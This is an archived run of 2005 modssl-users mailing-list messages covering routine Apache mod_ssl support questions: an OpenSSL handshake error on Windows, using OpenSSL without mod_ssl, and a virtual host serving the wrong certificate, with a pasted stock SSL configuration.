	by master.modssl.org (Postfix) with ESMTP id 2915714D991
	for ; Wed, 20 Jul 2005 12:35:50 +0200 (CEST)
X-MIMEOLE: Produced By Microsoft Exchange V6.0.6249.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C58D16.CBD84574"
Subject: mod sslerror in s23_clnt.c:494
Date: Wed, 20 Jul 2005 12:35:49 +0200
Message-ID: <9EF2AB3E0883EF44BD60FD5917435A3A54E0CC@mbi-hq-it-ex001.mbi.co.at>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: mod sslerror in s23_clnt.c:494
Thread-index: AcWNECWLuMuV2j9fQNOR275xdYe1HAABmVDA
From: "Nitschke Michael" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nitschke Michael" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C58D16.CBD84574
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I have a Win2003 Enterprise Server which is clustered with another =
win2k3Enterprise but running at the moment as single.

On the machine is a Apache 2.0.54(win32)  mod_ssl 2.0.54 OpenSSL 0.9.7g =
and mod_jk/1.2.13 and a tomcat 5.5 installed.

I have added the add mod_ssl line in httpd.conf and included ssl.conf =
with a sslvhosts.conf with all the certs correctly placed.

I have copied ssleay32.dll and libeay32.dll into the  windows/system32.

This configuration is running on 2 other machines (not clustered)  =
without any problem.

=20

If I try to connect to it with ssl I get no response and no real =
errormessage in the logs.

Then I tried openssl.exe with s_client -connect 127.0.0.1:443            =
(other ip used)

And got this output:

Loading 'screen' into random state - done

=20

CONNECTED(00000768)

5536:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown =
protocol:ssl/s23_clnt.c:494:

=20

I googled for the error (140770FC) and for the code line =
(s23_clnt.c:494) but didn't get any clue for my problem.

=20

I hope anybody has a clue for me, cause im running low on ideas what =
else I could try.

=20

Thanx inadvance

Michael Nitschke

=20

MBI Institut f=FCr Marketingberatung AG

=20

Hietzinger Hauptstra=DFe 119-121
A-1130  Wien
tel +43 (1) 8777474 9747
fax +43 (1) 8777474 9712
e-mail mnitschke@mbi.co.at=20
www.mbi.co.at=20

=20

=20

=20

Der Austausch von Nachrichten mit o.a. Absender via e-mail dient =
ausschliesslich Informationszwecken.=20
Rechtsgeschaeftliche Erklaerungen duerfen ueber dieses Medium nicht =
ausgetauscht werden.
=20

=20

Correspondence with a.m. sender via e-mail is only for information =
purposes.=20
This medium is not to be used for the exchange of legally-binding =
communications.

=20


------_=_NextPart_001_01C58D16.CBD84574
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
















I have a Win2003 Enterprise Server which is =
clustered
with another win2k3Enterprise but running at the moment as =
single.



On the machine is a Apache 2.0.54(win32)
 mod_ssl 2.0.54 OpenSSL 0.9.7g and mod_jk/1.2.13 and a tomcat 5.5
installed.



I have added the add mod_ssl line in =
httpd.conf and
included ssl.conf with a sslvhosts.conf with
all the certs correctly placed.



I have copied ssleay32.dll and libeay32.dll =
into the =
=A0windows/system32.



This configuration is running on 2 other =
machines
(not clustered)  without any problem.



 



If I try to connect to it with ssl I get no =
response
and no real errormessage in the logs.



Then I tried openssl.exe with s_client =
–connect
127.0.0.1:443          =
 
(other ip used)



And got this =
output:



Loading 'screen' into random state - =
done



 



CONNECTED(00000768)


5536:error:140770FC:SSL
routines:SSL23_GET_SERVER_HELLO:unknown =
protocol:ssl/s23_clnt.c:494:



 



I googled for the error (140770FC) and for the =
code
line (s23_clnt.c:494) but didn’t get any clue for my =
problem.



 



I hope anybody has a clue for me, cause im =
running
low on ideas what else I could try.



 



Thanx inadvance



Michael Nitschke



 



MBI Institut f=FCr Marketingberatung =
AG






 






Hietzinger Hauptstra=DFe 119-121

A-1130  Wien

tel +43 (1) 8777474 9747

fax +43 (1) 8777474 9712

e-mail mnitschke@mbi.co.at =


www.mbi.co.at =







 






 






 






Der Austausch von Nachrichten mit o.a. Absender via =
e-mail
dient ausschliesslich Informationszwecken. 

Rechtsgeschaeftliche Erklaerungen duerfen ueber dieses Medium nicht
ausgetauscht werden.

 






 






Correspondence with a.m. sender via e-mail is only =
for information
purposes. 

This medium is not to be used for the exchange of
legally-binding communications.



 









------_=_NextPart_001_01C58D16.CBD84574--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 20 16:02:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ADF9214D9AA; Wed, 20 Jul 2005 16:02:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from frcldn101.fr1.usf.ihost.com (frcldn101.fr1.usf.ihost.com [129.35.128.8])
	by master.modssl.org (Postfix) with ESMTP id 4B86E14D991
	for ; Wed, 20 Jul 2005 16:02:00 +0200 (CEST)
Received: from fr100ix3aspws04.aspaway.org (fr100ix3aspws04.clg.usf.ibm.com [129.35.132.112])
	by frcldn101.fr1.usf.ihost.com (Switch-2.2.8/Switch-2.2.8) with ESMTP id j6KE1xu44160
	for ; Wed, 20 Jul 2005 16:01:59 +0200
Subject: Jean-Pierre Guilloteau est absent(e).
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 20 Jul 2005 16:01:39 +0200
X-MIMETrack: Serialize by Router on M01ASPW/SRV/ASPAWAY(603HF91 | October 29, 2003) at
 07/20/2005 04:01:59 PM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Je serai absent(e) du  02/07/2005 au 25/07/2005.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez contacter Aspaway au 01 46 67 88 88.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 25 22:12:59 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 55E5D14D994; Mon, 25 Jul 2005 22:12:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.lsi.usp.br (gateway.lsi.usp.br [143.107.161.159])
	by master.modssl.org (Postfix) with SMTP id 7886514D977
	for ; Mon, 25 Jul 2005 22:12:55 +0200 (CEST)
Received: (qmail 26036 invoked from network); 25 Jul 2005 20:13:55 -0000
Received: from unknown (HELO jack) (10.0.161.244)
  by mail.lsi.usp.br with SMTP; 25 Jul 2005 20:13:55 -0000
Message-ID: <002701c59155$3b0e2e80$f4a1000a@lsi.intranet>
From: "Leonardo Cavallari Militelli" 
To: 
Subject: HTTPS Without OpenSSL Native
Date: Mon, 25 Jul 2005 17:12:48 -0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0024_01C5913C.1536B7E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2527
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
X-BitDefender-SpamStamp: 1.1.4 
 049000040111AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI
X-BitDefender-Scanner: Clean, Agent: BitDefender Qmail 1.6.1 on
 galaxy25.intranet
X-BitDefender-Spam: No (25)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Leonardo Cavallari Militelli" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0024_01C5913C.1536B7E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi all,

I'm looking for another way to implement ssl on an apache web server =
than using mod_ssl or apache-ssl.=20
Is there a way to implement ssl directly with Openssl?

I'm developing an intrusion detection and prevention system for my msc =
thesis. I already use the sample web server that comes with openssl, but =
now I need to know which are the relation between mod_ssl and the =
openssl?

tks anyway!

Leo
------=_NextPart_000_0024_01C5913C.1536B7E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi all,


 


I'm looking for another way to =
implement ssl on an=20
apache web server than using mod_ssl or apache-ssl. 


Is there a way to implement ssl =
directly with=20
Openssl?


 


I'm developing an intrusion detection =
and=20
prevention system for my msc thesis. I already use the sample web server =
that=20
comes with openssl, but now I need to know which are the relation =
between=20
mod_ssl and the openssl?


 


tks anyway!


 


Leo


------=_NextPart_000_0024_01C5913C.1536B7E0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 25 22:17:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9247A14D99D; Mon, 25 Jul 2005 22:17:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sl.pt (mail.sl.pt [212.55.140.13])
	by master.modssl.org (Postfix) with ESMTP id 1A52614D977
	for ; Mon, 25 Jul 2005 22:17:46 +0200 (CEST)
Received: (qmail 25761 invoked from network); 25 Jul 2005 20:17:44 -0000
Received: from unknown (HELO [192.168.1.2]) (dbcm@sl.pt@[82.154.20.170])
          (envelope-sender )
          by mail.sl.pt (qmail-ldap-1.03) with RC4-SHA encrypted SMTP
          for ; 25 Jul 2005 20:17:44 -0000
In-Reply-To: <002701c59155$3b0e2e80$f4a1000a@lsi.intranet>
References: <002701c59155$3b0e2e80$f4a1000a@lsi.intranet>
Mime-Version: 1.0 (Apple Message framework v733)
X-Priority: 3
Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha1; boundary="Apple-Mail-4-134057325"
Message-Id: <9E648EDE-499D-4C56-95B6-5E940C8FD3F0@co.sapo.pt>
From: Delfim Machado 
Subject: Re: HTTPS Without OpenSSL Native
Date: Mon, 25 Jul 2005 21:17:41 +0100
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
X-Pgp-Agent: GPGMail 1.1.1 (Tiger)
X-Gpgmail-State: signed
X-Mailer: Apple Mail (2.733)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Delfim Machado 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--Apple-Mail-4-134057325
Content-Type: multipart/alternative; boundary=Apple-Mail-3-134057151


--Apple-Mail-3-134057151
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset=US-ASCII;
	delsp=yes;
	format=flowed

stunnel?


On Jul 25, 2005, at 21:12, Leonardo Cavallari Militelli wrote:

> Hi all,
>
> I'm looking for another way to implement ssl on an apache web  
> server than using mod_ssl or apache-ssl.
> Is there a way to implement ssl directly with Openssl?
>
> I'm developing an intrusion detection and prevention system for my  
> msc thesis. I already use the sample web server that comes with  
> openssl, but now I need to know which are the relation between  
> mod_ssl and the openssl?
>
> tks anyway!
>
> Leo
>

--
Delfim Machado

~ "Serei sempre o que nunca irei ser! Sempre serei o que nunca vais  
ver!" - Eu mesmo


--Apple-Mail-3-134057151
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
	charset=ISO-8859-1

stunnel?


On Jul 25, =
2005, at 21:12, Leonardo Cavallari Militelli wrote:

Hi =
all,
=A0
Is there a way to =
implement ssl directly with Openssl?
=A0
I'm developing an intrusion detection and prevention =
system for my msc thesis. I already use the sample web server that comes =
with openssl, but now I need to know which are the relation between =
mod_ssl and the openssl?
=A0
=A0

 =

--
Delfim Machado

~ "Serei sempre o que nunca =
irei ser! Sempre serei o que nunca vais ver!" - Eu mesmo
 =


=

--Apple-Mail-3-134057151--

--Apple-Mail-4-134057325
content-type: application/pgp-signature; x-mac-type=70674453;
	name=PGP.sig
content-description: This is a digitally signed message part
content-disposition: inline; filename=PGP.sig
content-transfer-encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFC5Ujn6XDsmUqBS/QRAhQhAJ905RlgWbBqx0zhZPFYNi0eJTwfsgCdE9AO
PQv5Q2MA2biEzEW4dv57i9I=
=u+eG
-----END PGP SIGNATURE-----

--Apple-Mail-4-134057325--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 25 22:24:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0F32A14D99D; Mon, 25 Jul 2005 22:24:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.lsi.usp.br (gateway.lsi.usp.br [143.107.161.159])
	by master.modssl.org (Postfix) with SMTP id 6C3FA14D990
	for ; Mon, 25 Jul 2005 22:24:26 +0200 (CEST)
Received: (qmail 31526 invoked from network); 25 Jul 2005 20:25:27 -0000
Received: from unknown (HELO jack) (10.0.161.244)
  by mail.lsi.usp.br with SMTP; 25 Jul 2005 20:25:26 -0000
Message-ID: <003a01c59156$d741b5f0$f4a1000a@lsi.intranet>
From: "Leonardo Cavallari Militelli" 
To: 
References: <002701c59155$3b0e2e80$f4a1000a@lsi.intranet> <9E648EDE-499D-4C56-95B6-5E940C8FD3F0@co.sapo.pt>
Subject: Re: HTTPS Without OpenSSL Native
Date: Mon, 25 Jul 2005 17:24:20 -0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0037_01C5913D.B186C800"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2527
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
X-BitDefender-SpamStamp: 1.1.4 
 049000040111AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAI
X-BitDefender-Scanner: Clean, Agent: BitDefender Qmail 1.6.1 on
 galaxy25.intranet
X-BitDefender-Spam: No (0)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Leonardo Cavallari Militelli" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0037_01C5913D.B186C800
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I don't think this is the right solution.

I modified some libs on the openssl source, but on the mod_ssl they look =
different.

So, I wonder if there 's any way to instance an https using OpenSSL =
directly( without mod_ssl or apache-ssl) or if someone could tell me the =
relationship between OpenSSL and mod_ssl.

Tks!

  ----- Original Message -----=20
  From: Delfim Machado=20
  To: modssl-users@modssl.org=20
  Sent: Monday, July 25, 2005 5:17 PM
  Subject: Re: HTTPS Without OpenSSL Native


  stunnel?




  On Jul 25, 2005, at 21:12, Leonardo Cavallari Militelli wrote:


    Hi all,

    I'm looking for another way to implement ssl on an apache web server =
than using mod_ssl or apache-ssl.
    Is there a way to implement ssl directly with Openssl?

    I'm developing an intrusion detection and prevention system for my =
msc thesis. I already use the sample web server that comes with openssl, =
but now I need to know which are the relation between mod_ssl and the =
openssl?

    tks anyway!

    Leo




  --
  Delfim Machado


  ~ "Serei sempre o que nunca irei ser! Sempre serei o que nunca vais =
ver!" - Eu mesmo


------=_NextPart_000_0037_01C5913D.B186C800
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









I don't think this is the right=20
solution.


 


I modified some libs on the openssl =
source, but on=20
the mod_ssl they look different.


 


So, I wonder if there 's any way to =
instance an=20
https using OpenSSL directly( without mod_ssl or apache-ssl) or if =
someone could=20
tell me the relationship between OpenSSL and mod_ssl.


 


Tks!


 



  
----- Original Message ----- 

  From:=20
  Delfim =
Machado=20
  
  
  
Sent: Monday, July 25, 2005 =
5:17 PM

  
Subject: Re: HTTPS Without =
OpenSSL=20
  Native

  

stunnel?
  


  


  

  
On Jul 25, 2005, at 21:12, Leonardo Cavallari Militelli =
wrote:

  

    
Hi =
all,

    
 

    
I'm looking for =
another way to=20
    implement ssl on an apache web server than using mod_ssl or=20
    apache-ssl.

    
Is there a way to =
implement ssl=20
    directly with Openssl?

    
 

    
I'm developing an =
intrusion=20
    detection and prevention system for my msc thesis. I already use the =
sample=20
    web server that comes with openssl, but now I need to know which are =
the=20
    relation between mod_ssl and the openssl?

    
 

    
tks =
anyway!

    
 

    
Leo


  

  
--

  
Delfim Machado

  


  
~ "Serei sempre o que nunca irei ser! Sempre serei o que nunca =
vais ver!"=20
  - Eu mesmo



------=_NextPart_000_0037_01C5913D.B186C800--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 26 04:16:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B8BF714D994; Tue, 26 Jul 2005 04:16:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from house.arach.net.au (house2.arach.net.au [203.30.44.85])
	by master.modssl.org (Postfix) with ESMTP id 2843F14D974
	for ; Tue, 26 Jul 2005 04:16:48 +0200 (CEST)
Received: (qmail 5687 invoked from network); 26 Jul 2005 02:16:45 -0000
Message-ID: <20050726021645.5686.qmail@house.arach.net.au>
Received: from unknown (HELO pj28) (pj@netfire.com.au@203.153.243.58)
  by house2.arach.net.au with ESMTPA; 26 Jul 2005 02:16:44 -0000
From: "Pj" 
To: 
Subject: RE: HTTPS Without OpenSSL Native
Date: Tue, 26 Jul 2005 10:10:54 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
In-Reply-To: <9E648EDE-499D-4C56-95B6-5E940C8FD3F0@co.sapo.pt>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Thread-Index: AcWRVhZ2L5vJupp3Rc6Z0+XVqsNPAwAMN8VA
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pj" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Download the apache source and study mod_ssl its pretty clean...


-----Original Message-----
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of Delfim Machado
Sent: Tuesday, 26 July 2005 4:18 AM
To: modssl-users@modssl.org
Subject: Re: HTTPS Without OpenSSL Native

stunnel?


On Jul 25, 2005, at 21:12, Leonardo Cavallari Militelli wrote:



Hi all,
=A0
I'm looking for another way to implement ssl on an apache web server =
than
using mod_ssl or apache-ssl.
Is there a way to implement ssl directly with Openssl?
=A0
I'm developing an intrusion detection and prevention system for my msc
thesis. I already use the sample web server that comes with openssl, but =
now
I need to know which are the relation between mod_ssl and the openssl?
=A0
tks anyway!
=A0
Leo



--
Delfim Machado

~ "Serei sempre o que nunca irei ser! Sempre serei o que nunca vais =
ver!" -
Eu mesmo


--=20
No virus found in this incoming message.
Checked by AVG Anti-Virus.
Version: 7.0.338 / Virus Database: 267.9.4/57 - Release Date: 22/07/2005
=20
 =20

--=20
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.338 / Virus Database: 267.9.5/58 - Release Date: 25/07/2005
=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 26 18:34:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4A74914D99D; Tue, 26 Jul 2005 18:34:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from saltspring.math.uwaterloo.ca (saltspring.cs.uwaterloo.ca [129.97.79.37])
	by master.modssl.org (Postfix) with ESMTP id 6C1B314D974
	for ; Tue, 26 Jul 2005 18:34:27 +0200 (CEST)
Received: from saltspring.math.uwaterloo.ca (vlad@localhost.math.uwaterloo.ca [127.0.0.1])
	by saltspring.math.uwaterloo.ca (8.13.3/8.13.3) with ESMTP id j6QGYNas030489
	for ; Tue, 26 Jul 2005 12:34:23 -0400 (EDT)
Received: (from vlad@localhost)
	by saltspring.math.uwaterloo.ca (8.13.3/8.13.0/Submit) id j6QGYMdN010080
	for modssl-users@modssl.org; Tue, 26 Jul 2005 12:34:22 -0400 (EDT)
Date: Tue, 26 Jul 2005 12:34:22 -0400
From: Vlad Ciubotariu 
To: modssl-users@modssl.org
Subject: certificate weirdness
Message-ID: <20050726163422.GA14812@saltspring.math.uwaterloo.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vlad Ciubotariu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm doing something wrong in my config file.  For some reason, when
pointed to https://calendar.mydomain.ca the browser tells me the
security certificate belongs to mail.mydomain.ca even though the two
domains have been configured with different certificates.

Could anyone shed some light, please? Thanks in advance.

##
##  SSL Support
##
##  When we also provide SSL we have to listen to the 
##  standard HTTP port (see above) and to the HTTPS port
##

Listen 80
Listen 443


...............................................................................

NameVirtualHost *:80
NameVirtualHost *:443

#
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.


    ServerAdmin web@mydomain.org
    DocumentRoot /var/www/virthosts/mail
    ServerName mail.mydomain.org
    Redirect / https://mail.mydomain.org/



    ServerAdmin web@mydomain.org
    DocumentRoot /var/www/virthosts/calendar
    ServerName calendar.mydomain.org
    Redirect / https://calendar.mydomain.org/



##
##  SSL Global Context
##
##  All SSL configuration in this context applies both to
##  the main server and all SSL-enabled virtual hosts.
##

#
#   Some MIME-types for downloading Certificates and CRLs
#

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl




#   Pass Phrase Dialog:
#   Configure the pass phrase gathering process.
#   The filtering dialog program (`builtin' is a internal
#   terminal dialog) has to provide the pass phrase on stdout.
SSLPassPhraseDialog  builtin

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First either `none'
#   or `dbm:/path/to/file' for the mechanism to use and
#   second the expiring timeout (in seconds).
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

#   Semaphore:
#   Configure the path to the mutual exclusion semaphore the
#   SSL engine uses internally for inter-process synchronization. 
SSLMutex  sem

#   Pseudo Random Number Generator (PRNG):
#   Configure one or more sources to seed the PRNG of the 
#   SSL library. The seed data should be of good random quality.
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512
SSLRandomSeed startup file:/dev/arandom  512

#   Logging:
#   The home of the dedicated SSL protocol logfile. Errors are
#   additionally duplicated in the general error log file.  Put
#   this somewhere where it cannot be used for symlink attacks on
#   a real server (i.e. somewhere where only root can write).
#   Log levels are (ascending order: higher ones include lower ones):
#   none, error, warn, info, trace, debug.
SSLLog      logs/ssl_engine_log
SSLLogLevel info





##
## SSL Virtual Host Context
##


    ServerAdmin web@mydomain.org
    DocumentRoot /var/www/virthosts/mail
    ServerName mail.mydomain.org
    SSLEngine on
    SSLCertificateFile    /etc/ssl/webmail.crt
    SSLCertificateKeyFile /etc/ssl/private/webmail.key
    
      SSLRequireSsl
    



    ServerAdmin web@mydomain.org
    DocumentRoot /var/www/virthosts/calendar
    ServerName calendar.mydomain.org
    SSLEngine on
    SSLCertificateFile    /etc/ssl/calendar.crt
    SSLCertificateKeyFile /etc/ssl/private/calendar.key
    
      SSLRequireSsl
    
    
        Order allow,deny
	Allow from all
    
    
        SetHandler perl-script
        PerlHandler Apache::Registry
        #PerlHandler Apache::PerlRun
        Options ExecCGI
        PerlSendHeader On
    

#

#  General setup for the virtual host
#DocumentRoot /var/www/htdocs
#ServerName new.host.name
#ServerAdmin you@your.address
#ErrorLog logs/error_log
#TransferLog logs/access_log

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
#SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP

#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again. A test
#   certificate can be generated with `make certificate' under
#   built time.
SSLCertificateFile    /etc/ssl/server.crt

#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.
SSLCertificateKeyFile /etc/ssl/private/server.key

#   Certificate Authority (CA):
#   Set the CA certificate verification path where to find CA
#   certificates for client authentication or alternatively one
#   huge file containing all of them (file must be PEM encoded)
#   Note: Inside SSLCACertificatePath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCACertificatePath    /var/www/conf/ssl.crt
#SSLCACertificateFile    /var/www/conf/ssl.crt/ca-bundle.crt

#   Client Authentication (Type):
#   Client certificate verification type and depth.  Types are
#   none, optional, require and optional_no_ca.  Depth is a
#   number which specifies how deeply to verify the certificate
#   issuer chain before deciding the certificate is not valid.
#SSLVerifyClient require
#SSLVerifyDepth  10

#   Access Control:
#   With SSLRequire you can do per-directory access control based
#   on arbitrary complex boolean expressions containing server
#   variable checks and other lookup directives.  The syntax is a
#   mixture between C and Perl.  See the mod_ssl documentation
#   for more details.
#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)-/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#

#   SSL Engine Options:
#   Set various options for the SSL engine.
#   FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means that
#     the standard Auth/DBMAuth methods can be used for access control.  The
#     user name is the `one line' version of the client's X.509 certificate.
#     Note that no password is obtained from the user. Every entry in the user
#     file needs this password: `xxj31ZMTZzkVA'.
#   ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the certificates
#     into CGI scripts.
#   CompatEnvVars:
#     This exports obsolete environment variables for backward compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use this
#     to provide compatibility to existing CGI scripts.
#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars

#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
#CustomLog logs/ssl_request_log \
#          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

                                  



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 27 15:49:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6D87514D9A1; Wed, 27 Jul 2005 15:49:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web42405.mail.yahoo.com (web42405.mail.yahoo.com [66.218.93.228])
	by master.modssl.org (Postfix) with SMTP id BF2AE14D97C
	for ; Wed, 27 Jul 2005 15:49:49 +0200 (CEST)
Received: (qmail 52593 invoked by uid 60001); 27 Jul 2005 13:49:12 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
